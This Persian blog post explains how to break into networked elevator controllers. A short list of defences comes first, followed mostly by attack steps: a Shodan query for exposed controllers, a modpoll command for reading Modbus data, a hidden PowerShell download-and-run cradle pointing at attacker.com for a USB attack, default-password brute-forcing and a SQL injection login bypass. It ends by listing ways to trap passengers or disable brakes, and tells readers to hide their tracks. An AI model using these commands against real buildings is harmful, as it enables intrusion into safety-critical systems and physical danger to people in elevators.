Mestercoputer

آسانسور فقط یه جعبه‌ فلزی نیست که ما رو بالا پایین ببره. این روزا بیشترشون وصل به شبکه‌ هستن، کلی کامپیوتر و کنترلر دارن، حتی بعضی‌هاشون پنل وب دارن واسه کنترل از راه دور! حالا اگه بگم میشه با یه لپ‌تاپ یا حتی گوشی به بعضی از این‌ها نفوذ کرد چی؟ این مقاله قراره درباره همین تهدیدهای امنیتی صحبت کنه، همراه با نمونه‌های واقعی و روش‌های نفوذ.

چطوری جلوی این ماجراها رو بگیریم؟

حتماً فایروال و رمزگذاری بین کنترلرها استفاده شه

رمزهای پیش‌فرض رو سریع عوض کن

احراز هویت چندعاملی بذار

اتاق کنترل رو قفل کن، جدی!

به‌روز نگه‌داشتن فرم‌ور و سیستم‌عامل پنل‌ها خیلی مهمه

لاگ‌گیری و مانیتورینگ فعال باشه، حتی اگه شبکه لوکاله

خوب بدون مقدمه بریم سراغ اصل مطلب که اصلا چجوری هست البته سانسور شده یک مقدار 

چطوری از راه دور دست به آسانسور بزنیم؟

اتصال به شبکه بدون قفل!

خیلیا نمی‌دونن که پنل‌های آسانسور بعضی وقتا از طریق اینترنت یا LAN به سیستم مدیریت ساختمون وصل‌ان. حالا اگه فایروال درست تنظیم نشده باشه یا رمز پیش‌فرض هنوز فعال باشه، هکر با یه سرچ ساده تو Shodan راحت پیداشون می‌کنه.

مثال واقعی:
یه هکر تو سال ۲۰۱۹ با همین Shodan بیش از ۱۰۰ تا کنترلر آسانسور رو پیدا کرد که نه تنها رمز نداشتن، بلکه میشد از طریق مرورگر از خونه اونا رو کنترل کرد!

shodan search "Elevator controller port:80"

پروتکل‌های قدیمی و ناامن

خیلی از این سیستم‌ها هنوز دارن با Modbus TCP یا BACnet/IP کار می‌کنن. نه رمزنگاری، نه احراز هویت، هیچی!

مثال:
با یه ابزار مثل modpoll خیلی راحت میشه به دیتاهاشون دسترسی گرفت:

modpoll -m tcp -t 3 -r 100 192.168.1.100

۲. اگه بتونی به تابلو کنترل برسی چی؟

دسترسی فیزیکی، شاه‌کلیده

تابلو برق آسانسور یا جعبه کنترل اگه قفل درست حسابی نداشته باشه، دیگه هک نمی‌خواد، فقط یه پیچ‌گوشتی یا کلید جنرال.

PoC جالب:
یه بدافزار روی USB بریز، بندازش به سیستم کنترل. با Rubber Ducky هم میشه یه اسکریپت ساخت که یه شل بهت بده:

powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

۳. ترفندهای نرم‌افزاری و سایبری

Brute-force با رمزهای ساده

بعضی کنترلرها هنوز با admin و 1234 کار می‌کنن! اصلاً انگار منتظرن هک بشن.

SQL Injection روی فرم لاگین

اگه پنل تحت وب دارن و ضد SQL Injection نبستن، میشه خیلی راحت لاگین رو دور زد:

' OR '1'='1

کامندهای مخفی داخل آسانسور

تو بعضی مدل‌های قدیمی‌تر، اگه یه سری دکمه‌ها رو با هم بزنی یا یه ترتیب خاصو رعایت کنی، وارد حالت تنظیمات میشی. بعضی وقتا بدون نیاز به رمز!

۴. چی میشه اگه کنترل بیفته دست هکر؟

درِ آسانسور باز بمونه یا بین طبقات گیر کنه

کسیو داخل کابین حبس کنی (یه جور DoS فیزیکی!)

بره طبقه‌ای که نباید بره، مخصوصاً توی مراکز حساس

سیستم ترمز یا سنسور رو غیر فعال کنی (خطرناک و ممنوعه جدی!)

از intercom یا سیستم مانیتورینگ صدای داخل کابین شنود کنی. 

و دیگه خلاقیت های عجیبی که نگم ! 

ارادتمند دوستان . مواضب ردپاهاتون باشید ❤️🌹